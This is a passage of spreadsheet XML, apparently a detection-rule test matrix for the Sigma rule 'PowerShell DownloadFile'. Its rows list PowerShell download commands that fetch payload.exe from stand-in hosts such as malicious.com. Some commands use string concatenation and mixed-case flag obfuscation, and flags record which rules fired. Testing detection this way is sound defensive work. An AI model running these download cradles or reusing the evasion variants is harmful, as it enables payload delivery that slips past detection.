        <v>1</v>
      </c>
      <c r="G3101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3101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101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3102" ht="15.75" customHeight="1" s="42">
      <c r="A3102" s="43" t="n"/>
      <c r="B3102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3102" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3102" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3102" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3102" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3103" ht="15.75" customHeight="1" s="42">
      <c r="A3103" s="43" t="n"/>
      <c r="B3103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3103" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3103" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3103" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3103" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3103" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3103" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3104" ht="15.75" customHeight="1" s="42">
      <c r="A3104" s="43" t="n"/>
      <c r="B3104" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3104" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3104" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3104" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3104" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3104" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3104" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3105" ht="15.75" customHeight="1" s="42">
      <c r="A3105" s="44" t="n"/>
      <c r="B3105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3105" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3105" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3105" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3105" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3105" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3105" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3105" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3106" ht="15.75" customHeight="1" s="42">
      <c r="A3106" s="43" t="n"/>
      <c r="B3106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3106" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3106" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3106" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3106" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3106" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3107" ht="15.75" customHeight="1" s="42">
      <c r="A3107" s="43" t="n"/>
      <c r="B3107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3107" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3107" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3107" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3107" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3107" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3108" ht="15.75" customHeight="1" s="42">
      <c r="A3108" s="43" t="n"/>
      <c r="B3108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3108" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3108" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3108" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3108" s="44" t="n"/>
      <c r="J3108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3108" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3109" ht="15.75" customHeight="1" s="42">
      <c r="A3109" s="43" t="n"/>
      <c r="B3109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3109" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3109" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3109" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3109" s="44" t="n"/>
      <c r="J3109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3109" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3110" ht="15.75" customHeight="1" s="42">
      <c r="A3110" s="43" t="n"/>
      <c r="B3110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3110" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3110" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3110" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3110" s="43" t="n"/>
      <c r="J3110" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3110" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3111" ht="15.75" customHeight="1" s="42">
      <c r="A3111" s="43" t="n"/>
      <c r="B3111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3111" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3111" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3111" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3111" s="43" t="n"/>
      <c r="J3111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3111" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3112" ht="15.75" customHeight="1" s="42">
      <c r="A3112" s="43" t="n"/>
      <c r="B3112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3112" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3112" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3112" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3112" s="44" t="n"/>
      <c r="J3112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3112" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3113" ht="15.75" customHeight="1" s="42">
      <c r="A3113" s="43" t="n"/>
      <c r="B3113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3113" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3113" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3113" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3113" s="44" t="n"/>
      <c r="J3113" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3113" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3114" ht="15.75" customHeight="1" s="42">
      <c r="A3114" s="43" t="n"/>
      <c r="B3114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3114" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3114" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3114" s="44" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F3114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3114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14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3115" ht="15.75" customHeight="1" s="42">
      <c r="A3115" s="43" t="n"/>
      <c r="B3115" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3115" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3115" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3115" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F3115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3115" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3115" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3115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15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3115" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3116" ht="15.75" customHeight="1" s="42">
      <c r="A3116" s="43" t="n"/>
      <c r="B3116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3116" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3116" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3116" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3116" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3116" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3116" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3116" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3116" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3117" ht="15.75" customHeight="1" s="42">
      <c r="A3117" s="43" t="n"/>
      <c r="B3117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3117" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3117" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3117" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3117" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3117" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3117" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3117" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3118" ht="15.75" customHeight="1" s="42">
      <c r="A3118" s="43" t="n"/>
      <c r="B3118" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3118" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3118" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3118" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3118" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3118" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3118" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3118" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3119" ht="15.75" customHeight="1" s="42">
      <c r="A3119" s="43" t="n"/>
      <c r="B3119" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3119" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3119" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3119" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3119" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3119" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3119" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3119" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3120" ht="15.75" customHeight="1" s="42">
      <c r="A3120" s="44" t="n"/>
      <c r="B3120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3120" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3120" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3120" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3120" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3121" ht="15.75" customHeight="1" s="42">
      <c r="A3121" s="44" t="n"/>
      <c r="B3121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3121" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3121" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3121" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3121" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3122" ht="15.75" customHeight="1" s="42">
      <c r="A3122" s="44" t="n"/>
      <c r="B3122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3122" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3122" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3122" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3122" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3123" ht="15.75" customHeight="1" s="42">
      <c r="A3123" s="44" t="n"/>
      <c r="B3123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3123" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3123" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3123" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3123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23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3124" ht="15.75" customHeight="1" s="42">
      <c r="A3124" s="44" t="n"/>
      <c r="B3124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3124" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3124" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3124" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3124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24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3125" ht="15.75" customHeight="1" s="42">
      <c r="A3125" s="44" t="n"/>
      <c r="B3125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3125" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3125" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3125" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I312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25" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3126" ht="15.75" customHeight="1" s="42">
      <c r="A3126" s="44" t="n"/>
      <c r="B3126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3126" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3126" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3126" s="44" t="inlineStr">
        <is>
